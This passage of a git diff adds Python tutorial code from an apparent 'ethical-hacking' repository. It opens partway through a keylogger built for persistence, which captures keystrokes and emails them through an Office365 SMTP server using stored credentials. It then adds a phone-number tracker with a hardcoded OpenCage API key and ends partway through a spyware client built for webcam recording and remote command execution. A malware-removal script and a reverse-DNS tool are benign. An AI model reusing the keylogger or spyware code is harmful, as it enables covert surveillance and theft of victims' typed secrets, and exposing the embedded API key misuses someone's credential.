+
+ 
+
+
+
+ Enter an IP address below:
+ + +www-data ++ +
+
+ Enter an IP address below:
+ + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +dhcp:x:101:102::/nonexistent:/bin/false +syslog:x:102:103::/home/syslog:/bin/false +klog:x:103:104::/home/klog:/bin/false +sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin +msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash +bind:x:105:113::/var/cache/bind:/bin/false +postfix:x:106:115::/var/spool/postfix:/bin/false +ftp:x:107:65534::/home/ftp:/bin/false +postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash +mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false +tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false +distccd:x:111:65534::/:/bin/false +user:x:1001:1001:just a user,111,,:/home/user:/bin/bash +service:x:1002:1002:,,,:/home/service:/bin/bash +telnetd:x:112:120::/nonexistent:/bin/false +proftpd:x:113:65534::/var/run/proftpd:/bin/false +statd:x:114:65534::/var/lib/nfs:/bin/false ++ +
+
+ Enter an IP address below:
+ + +total 20 +drwxr-xr-x 4 www-data www-data 4096 May 20 2012 . +drwxr-xr-x 11 www-data www-data 4096 May 20 2012 .. +drwxr-xr-x 2 www-data www-data 4096 May 20 2012 help +-rw-r--r-- 1 www-data www-data 1509 Mar 16 2010 index.php +drwxr-xr-x 2 www-data www-data 4096 May 20 2012 source ++ +
+
+ Enter an IP address below:
+ + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +dhcp:x:101:102::/nonexistent:/bin/false +syslog:x:102:103::/home/syslog:/bin/false +klog:x:103:104::/home/klog:/bin/false +sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin +msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash +bind:x:105:113::/var/cache/bind:/bin/false +postfix:x:106:115::/var/spool/postfix:/bin/false +ftp:x:107:65534::/home/ftp:/bin/false +postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash +mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false +tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false +distccd:x:111:65534::/:/bin/false +user:x:1001:1001:just a user,111,,:/home/user:/bin/bash +service:x:1002:1002:,,,:/home/service:/bin/bash +telnetd:x:112:120::/nonexistent:/bin/false +proftpd:x:113:65534::/var/run/proftpd:/bin/false +statd:x:114:65534::/var/lib/nfs:/bin/false ++ +
{message}
" + text_part = MIMEText(message, "plain") + html_part = MIMEText(html, "html") + msg.attach(text_part) + msg.attach(html_part) + return msg.as_string() + + def sendmail(self, email, password, message, verbose=1): + """Send an email using SMTP with the logged keystrokes.""" + server = smtplib.SMTP(host="smtp.office365.com", port=587) + server.starttls() + server.login(email, password) + server.sendmail(email, email, self.prepare_mail(message)) + server.quit() + if verbose: + print(f"{datetime.now()} - Sent an email to {email} containing: {message}") + + def report(self): + """Report the captured keystrokes either by email or by saving to a file.""" + if self.log: + self.end_dt = datetime.now() + self.update_filename() + if self.report_method == "email": + self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) + elif self.report_method == "file": + self.report_to_file() + self.start_dt = datetime.now() + self.log = "" + timer = Timer(interval=self.interval, function=self.report) + timer.daemon = True + timer.start() + + def start(self): + """Start the keylogger.""" + self.start_dt = datetime.now() + keyboard.on_release(callback=self.callback) + self.report() + print(f"{datetime.now()} - Started keylogger") + keyboard.wait() + + +if __name__ == "__main__": + keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="file") + keylogger.start() diff --git a/ethical-hacking/persistent-malware/requirements.txt b/ethical-hacking/persistent-malware/requirements.txt new file mode 100644 index 00000000..c2539834 --- /dev/null +++ b/ethical-hacking/persistent-malware/requirements.txt @@ -0,0 +1 @@ +keyboard diff --git a/ethical-hacking/phone-number-tracker/README.md b/ethical-hacking/phone-number-tracker/README.md new file mode 100644 index 00000000..7a5b80e2 --- /dev/null +++ b/ethical-hacking/phone-number-tracker/README.md @@ -0,0 +1 @@ +# [How to Make a Phone Number Tracker in Python](https://thepythoncode.com/article/phone-number-tracker-in-python) \ No newline at end of file diff --git a/ethical-hacking/phone-number-tracker/phone_number_tracker.py b/ethical-hacking/phone-number-tracker/phone_number_tracker.py new file mode 100644 index 00000000..acd1b6e3 --- /dev/null +++ b/ethical-hacking/phone-number-tracker/phone_number_tracker.py @@ -0,0 +1,149 @@ +import phonenumbers, sys, folium, os, argparse +from colorama import init, Fore +from phonenumbers import geocoder, timezone, carrier +init() + + +def process_number(number): + try: + global location + + # Parse the phone number. See this as extracting relevant information from the Phone number. + parsed_number = phonenumbers.parse(number) + + '''Display a message indicating the tracking attempt. We'll also format the parsed number to the + international format.''' + + print(f"{Fore.GREEN}[+] Attempting to track location of " + f"{phonenumbers.format_number(parsed_number, phonenumbers.PhoneNumberFormat.INTERNATIONAL)}..") + + # Get and display the time zone ID + print(f"{Fore.GREEN}[+] Time Zone ID: {timezone.time_zones_for_number(parsed_number)}") + + # Get the geographic location of the Phone number and display it. + location = geocoder.description_for_number(parsed_number, "en") + if location: + print(f"{Fore.GREEN}[+] Region: {location}") + else: + print(f"{Fore.RED}[-] Region: Unknown") + + '''Get the service provider (carrier) and display it if available. Some businesses and + organizations do not use public service providers. So you may not see the carrier in that case.''' + + if carrier.name_for_number(parsed_number, 'en'): + print(f"{Fore.GREEN}[+] Service Provider: {carrier.name_for_number(parsed_number, 'en')}") + else: + pass + + # Handle exceptions, such as invalid phone numbers or connectivity issues. + except Exception: + print(f"{Fore.RED}[-] Please specify a valid phone number (with country code)" + " or check your internet connection.") + sys.exit() + +def get_approx_coordinates(): + # Import the OpenCageGeocode class from the opencage.geocoder module + from opencage.geocoder import OpenCageGeocode + + global coder, latitude, longitude + + # Try to execute the following block, and handle exceptions if they occur. + try: + # Create an instance of the OpenCageGeocode class with your API key. + coder = OpenCageGeocode("42c84373c47e490ba410d4132ae64fc4") + + query = location + + # Perform a geocoding query to obtain results. + results = coder.geocode(query) + + # Extract latitude and longitude from the geocoding results. These are the coordinates of the number's location. + latitude = results[0]['geometry']['lat'] + longitude = results[0]['geometry']['lng'] + + # Print the obtained latitude and longitude. + print(f"[+] Latitude: {latitude}, Longitude: {longitude}") + + # Perform a reverse geocoding query to obtain an address based on coordinates. + address = coder.reverse_geocode(latitude, longitude) + + # Check if an address was found. + if address: + address = address[0]['formatted'] + print(f"{Fore.LIGHTRED_EX}[+] Approximate Location is {address}") + else: + # If no address was found, print an error message. + print(f"{Fore.RED}[-] No address found for the given coordinates.") + except Exception: + '''Handle exceptions by printing an error message and exiting the script. This would prevent the program from + crashing''' + + print(f"{Fore.RED}[-] Could not get the location of this number. Please specify a valid phone number or " + "check your internet connection.") + sys.exit() + +# This function basically removes unwanted characters from the Phone number such as white spaces. +def clean_phone_number(phone_number): + cleaned = ''.join(char for part in phone_number for char in part if char.isdigit() or char == '+') + return cleaned or "unknown" + +# Function to see Aerial view of the person's location. +def draw_map(): + try: + # Create a Folium map centered around the latitude and longitude of the number's coordinates. + my_map = folium.Map(location=[latitude, longitude], zoom_start=9) + + # Add a marker to the map at the specified latitude and longitude with a popup displaying the 'location' variable. + folium.Marker([latitude, longitude], popup=location).add_to(my_map) + + ''' Clean the phone number and use it to generate a file name with an '.html' extension + we'll basically save each map with the number of the owner for easy identification.''' + + cleaned_phone_number = clean_phone_number(args.phone_number) # We'll see 'args' soon. + file_name = f"{cleaned_phone_number}.html" + + # Save the map as an HTML file with the generated file name. + my_map.save(file_name) + + # Print a message indicating where the saved HTML file can be found. + print(f"[+] See Aerial Coverage at: {os.path.abspath(file_name)}") + + # Handle the 'NameError' exception, which can occur if the 'latitude' or 'longitude' variables are not defined. + except NameError: + print(f"{Fore.RED}[-] Could not get Aerial coverage for this number. Please check the number again.") + + +# Function to handle command-line arguments. +def cli_argument(): + # Create an ArgumentParser object and specify a description. + parser = argparse.ArgumentParser(description="Get approximate location of a Phone number.") + + # Define a command-line argument: -p or --phone. This is to receive the user's number from terminal. + parser.add_argument("-p", "--phone", dest="phone_number", type=str, + help="Phone number to track. Please include the country code when specifying the number.", + required=True, nargs="+") + + # Parse the command-line arguments. + argument = parser.parse_args() + + # Check if the 'phone_number' argument is not provided. + if not argument.phone_number: + # Print an error message indicating that the phone number is required. + print(f"{Fore.RED}[-] Please specify the phone number to track (including country code)." + " Use --help to see usage.") + + # Exit the script. + sys.exit() + + # Return the parsed command-line arguments. + return argument + +# Parse command-line arguments using the 'cli_argument' function. +args = cli_argument() + +# Call the process_number function and pass the phone number as a single string. +process_number("".join(args.phone_number)) +get_approx_coordinates() +draw_map() + + diff --git a/ethical-hacking/phone-number-tracker/requirements.txt b/ethical-hacking/phone-number-tracker/requirements.txt new file mode 100644 index 00000000..b1598993 --- /dev/null +++ b/ethical-hacking/phone-number-tracker/requirements.txt @@ -0,0 +1,4 @@ +phonenumbers +folium +colorama +opencage \ No newline at end of file diff --git a/ethical-hacking/remove-persistent-malware/README.md b/ethical-hacking/remove-persistent-malware/README.md new file mode 100644 index 00000000..6145b698 --- /dev/null +++ b/ethical-hacking/remove-persistent-malware/README.md @@ -0,0 +1 @@ +# [How to Remove Persistent Malware in Python](https://thepythoncode.com/article/removingg-persistent-malware-in-python) \ No newline at end of file diff --git a/ethical-hacking/remove-persistent-malware/remove_persistent_malware.py b/ethical-hacking/remove-persistent-malware/remove_persistent_malware.py new file mode 100644 index 00000000..88ba4f7e --- /dev/null +++ b/ethical-hacking/remove-persistent-malware/remove_persistent_malware.py @@ -0,0 +1,118 @@ +import os +import platform +import subprocess +import tempfile + +# Windows-specific imports +if platform.system() == "Windows": + import winreg + +# Get Windows start-up entries and display +def list_windows_startup_entries(): + key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run") + entries = [] + try: + i = 0 + while True: + entry_name, entry_value, entry_type = winreg.EnumValue(key, i) + entries.append((i + 1, entry_name, entry_value)) + i += 1 + except OSError: + pass + winreg.CloseKey(key) + return entries + +# Remove Windows start-up entries +def remove_windows_startup_entry(index, entries): + key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_SET_VALUE) + try: + entry_name, entry_value = entries[index - 1][1], entries[index - 1][2] + winreg.DeleteValue(key, entry_name) + print(f"[+] Entry {entry_name} has been removed successfully.") + + if os.path.isfile(entry_value): + os.remove(entry_value) + print(f"[+] File '{entry_value}' has been deleted successfully.") + else: + print(f"[-] File '{entry_value}' not found or unable to delete.") + except IndexError: + print("[-] Invalid entry index.") + except OSError as e: + print(f"[-] Error removing entry: {e}") + finally: + winreg.CloseKey(key) + +# Get the cron tab entries +def list_linux_crontab_entries(): + try: + output = subprocess.check_output(["crontab", "-l"], stderr=subprocess.STDOUT).decode('utf-8').strip() + if output: + entries = output.split("\n") + return [(i + 1, entry) for i, entry in enumerate(entries)] + else: + return [] + except subprocess.CalledProcessError as e: + if "no crontab" in e.output.decode('utf-8'): + return [] + else: + raise + +def remove_linux_crontab_entry(index, entries): + try: + entry = entries[index - 1][1] + all_entries = [e[1] for e in entries if e[1] != entry] + + with tempfile.NamedTemporaryFile(delete=False) as tmp_file: + tmp_file.write("\n".join(all_entries).encode('utf-8')) + tmp_file.write(b"\n") + tmp_file_path = tmp_file.name + + subprocess.check_output(["crontab", tmp_file_path], stderr=subprocess.STDOUT) + os.unlink(tmp_file_path) + print(f"[+] Entry '{entry}' has been removed successfully.") + except IndexError: + print("[-] Invalid entry index.") + except Exception as e: + print(f"[-] Error removing crontab entry: {e}") + +def main(): + os_name = platform.system() + if os_name == "Windows": + entries = list_windows_startup_entries() + if not entries: + print("[-] No startup entries found.") + else: + print("[+] Startup entries:") + for index, name, value in entries: + print(f"{index}. {name}: {value}") + + print("\n") + choice = int(input("[!] Enter the number of the entry you want to remove (0 to exit): ")) + if choice == 0: + return + elif 0 < choice <= len(entries): + remove_windows_startup_entry(choice, entries) + else: + print("[-] Invalid choice.") + elif os_name == "Linux": + entries = list_linux_crontab_entries() + if not entries: + print("[-] No crontab entries found.") + else: + print("[+] Crontab entries:") + for index, entry in entries: + print(f"{index}. {entry}") + + print("\n") + choice = int(input("[!] Enter the number of the entry you want to remove (0 to exit): ")) + if choice == 0: + return + elif 0 < choice <= len(entries): + remove_linux_crontab_entry(choice, entries) + else: + print("[-] Invalid choice.") + else: + print(f"[-] Unsupported operating system: {os_name}") + +if __name__ == "__main__": + main() diff --git a/ethical-hacking/reverse-dns-lookup/README.md b/ethical-hacking/reverse-dns-lookup/README.md new file mode 100644 index 00000000..e2aa69a3 --- /dev/null +++ b/ethical-hacking/reverse-dns-lookup/README.md @@ -0,0 +1 @@ +# [How to Perform Reverse DNS Lookups Using Python](https://thepythoncode.com/article/reverse-dns-lookup-with-python) \ No newline at end of file diff --git a/ethical-hacking/reverse-dns-lookup/requirements.txt b/ethical-hacking/reverse-dns-lookup/requirements.txt new file mode 100644 index 00000000..663bd1f6 --- /dev/null +++ b/ethical-hacking/reverse-dns-lookup/requirements.txt @@ -0,0 +1 @@ +requests \ No newline at end of file diff --git a/ethical-hacking/reverse-dns-lookup/reverse_lookup.py b/ethical-hacking/reverse-dns-lookup/reverse_lookup.py new file mode 100644 index 00000000..449f79d0 --- /dev/null +++ b/ethical-hacking/reverse-dns-lookup/reverse_lookup.py @@ -0,0 +1,69 @@ +# Import the necessary libraries +import argparse +import ipaddress +import socket +import requests + +API_KEY = "Your-Api-Key-Here" # Replace with your ViewDNS API key + +# Function to Check if IP address is valid. +def is_valid_ip(ip): + + try: + ipaddress.ip_address(ip) + return True + except ValueError: + return False + + +# Perform reverse look up. +def reverse_lookup(ip): + try: + domain = socket.gethostbyaddr(ip)[0] + return domain + except socket.herror: + return None + + +# Get websites on same server. +def get_websites_on_server(ip): + url = f"https://api.viewdns.info/reverseip/?host={ip}&apikey={API_KEY}&output=json" + response = requests.get(url) + if response.status_code == 200: + data = response.json() + if "response" in data and "domains" in data["response"]: + websites = data["response"]["domains"] + return websites + return [] + + +# Get user arguments and execute. +def main(): + parser = argparse.ArgumentParser(description="Perform IP reverse lookup.") + parser.add_argument("ips", nargs="+", help="IP address(es) to perform reverse lookup on.") + parser.add_argument("--all", "-a", action="https://github.com/store_true", help="Print all other websites on the same server.") + args = parser.parse_args() + + for ip in args.ips: + if not is_valid_ip(ip): + print(f"[-] Invalid IP address: {ip}") + continue + + domain = reverse_lookup(ip) + if domain: + print(f"[+] IP: {ip}, Domain: {domain}") + if args.all: + websites = get_websites_on_server(ip) + if websites: + print("\nOther websites on the same server:") + for website in websites: + print(f"[+] {website}") + print('\n') + else: + print("[-] No other websites found on the same server.") + else: + print(f"[-] No domain found for IP: {ip}") + + +if __name__ == "__main__": + main() diff --git a/ethical-hacking/spyware/README.md b/ethical-hacking/spyware/README.md new file mode 100644 index 00000000..9c2520c9 --- /dev/null +++ b/ethical-hacking/spyware/README.md @@ -0,0 +1 @@ +# [How to Build Spyware in Python](https://thepythoncode.com/article/how-to-build-spyware-in-python) \ No newline at end of file diff --git a/ethical-hacking/spyware/client.py b/ethical-hacking/spyware/client.py new file mode 100644 index 00000000..d36eca07 --- /dev/null +++ b/ethical-hacking/spyware/client.py @@ -0,0 +1,64 @@ +import socket # For network (client-server) communication. +import os # For handling os executions. +import subprocess # For executing system commands. +import cv2 # For recording the video. +import threading # For recording the video in a different thread. +import platform # We use this to get the os of the target (client). + +SERVER_HOST = "127.0.0.1" # Server's IP address +SERVER_PORT = 4000 +BUFFER_SIZE = 1024 * 128 # 128KB max size of messages, you can adjust this. + +# Separator string for sending 2 messages at a time. +SEPARATOR = "